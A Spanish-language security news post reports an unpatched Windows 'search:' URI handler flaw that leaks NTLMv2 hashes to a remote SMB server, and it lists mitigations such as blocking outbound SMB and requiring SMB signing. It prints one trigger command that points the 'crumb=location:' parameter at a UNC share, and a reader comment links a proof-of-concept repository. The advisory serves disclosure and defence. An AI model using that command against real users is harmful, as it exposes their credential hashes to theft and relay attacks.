SAFE. Guía para proteger tu vida digital y tu privacidad
Canal de Telegram

Jun 4, 2026

Segu-Info » , » Vulnerabilidad sin parchear en la URI de búsqueda de Windows permite a los atacantes robar hashes NTLMv2

Vulnerabilidad sin parchear en la URI de búsqueda de Windows permite a los atacantes robar hashes NTLMv2

Jun 4, 2026, 3:28:00 PM   1 comentario
  ,  

Investigadores de ciberseguridad han revelado detalles de una vulnerabilidad sin parchear que podría explotarse para obtener el hash NTLMv2 de un usuario.

Como resultado, un atacante podría aprovechar el hash capturado para realizar ataques de retransmisión y obtener un acceso más profundo a la red. Tras la divulgación responsable el 15 de abril de 2026, Microsoft se negó a abordar el problema, declarando que "solo los casos de gravedad Importante y Crítica cumplen con nuestros criterios para recibir soporte".

Al igual que en el caso de CVE-2026-33829, que afectaba al controlador de URI `ms-screensketch:` de la herramienta Recortes de Windows, la nueva vulnerabilidad detectada reside en el controlador de URI `search:`, según Huntress.

CVE-2026-33829 se refiere a una vulnerabilidad de suplantación de identidad que podría exponer información confidencial a un atacante no autorizado.

"Un atacante podría inducir al usuario a hacer clic en un enlace especialmente diseñado en un navegador web u otra URL, insertándolo en una página web o un correo electrónico", señaló Microsoft en su aviso de seguridad en aquel momento.

Si el usuario aprueba la apertura del enlace, la URL manipulada puede inducir al equipo a conectarse a un servidor SMB elegido por el atacante, lo que revelaría el hash NTLMv2 del usuario al atacante, quien podría usarlo para autenticarse como tal.

En concreto, el problema radicaba en que el controlador de URI de la Herramienta Recortes aceptaba un parámetro "filePath", no lo validaba y accedía a cualquier ruta UNC (Convención de Nombres Universales) que se le pasara. Esto, a su vez, podía activar la autenticación NTLM y exponer el hash Net-NTLMv2 de la víctima al atacante.

La vulnerabilidad recientemente descubierta logra el mismo objetivo final utilizando "search:" y "crumb=location:" en lugar de "filePath" con un comando como el siguiente: 

start "" "search:query=test&crumb=location:\\10.0.1.100\share"

"Utilizaba el mismo mecanismo de fuga NTLM, producía la misma fuga Net-NTLMv2, tenía los mismos requisitos previos y la misma calificación de Moderada", afirmó Andrew Schwartz, investigador de Huntress. Cabe destacar que el uso del parámetro "crumb" para robar el hash (CVE-2023-35636) fue documentado por Varonis en febrero de 2024.

A falta de una solución, se recomienda bloquear el tráfico SMB saliente (TCP/445 y TCP/139) en los hosts que no lo necesiten, exigir la firma SMB para que los hashes capturados no puedan reenviarse a servicios internos y deshabilitar NTLM donde corresponda.

Actualización: Este repositorio contiene una herramienta automatizada en Bash diseñada para auditar y verificar de manera pasiva y controlada si los activos con sistema operativo Windows son vulnerables a la manipulación insegura del manejador de protocolo search:.

Fuente: THN



Suscríbete a nuestro Boletín

1 comment:

  1. AnonymousJune 5, 2026 at 11:42 AM

    PoC en Bash para validar la vulnerabilidad de Windows Search URI. Monitorea mediante tcpdump los intentos de conexión remota por el puerto 445 tras interactuar con la URI de prueba. https://github.com/seguridadentrerios/CVE-2026-33829

    ReplyDelete

Gracias por dejar un comentario en Segu-Info.

Gracias por comentar!